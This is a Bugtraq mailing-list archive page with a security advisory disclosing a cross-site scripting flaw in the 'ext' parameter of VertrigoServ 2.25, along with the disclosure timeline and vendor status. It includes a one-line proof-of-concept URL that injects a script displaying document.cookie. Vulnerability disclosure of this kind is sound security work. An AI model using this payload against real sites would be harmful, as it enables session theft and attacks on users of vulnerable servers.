[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

VertrigoServ 2.25 Cross-Site-Scripting vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
From: security@xxxxxxxxxxxx
Date: Thu, 5 Jan 2012 17:27:42 GMT

Advisory:               VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory ID:            INFOSERVE-ADV2011-11
Author:                 Stefan Schurtz
Contact:                security@xxxxxxxxxxxx
Affected Software:      Successfully tested on VertrigoServ 2.25
Vendor URL:             http://vertrigo.sourceforge.net/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting 
vulnerability

==================
PoC-Exploit
==================

http://[target]/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

15-Dec-2011 - informed vendor
16-Dec-2011 - vendor feedback

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt

Prev by Date: VLC media player v1.1.11 (.amr) Local Crash PoC
Next by Date: SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities
Previous by thread: VLC media player v1.1.11 (.amr) Local Crash PoC
Next by thread: SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities
Index(es):
- Date
- Thread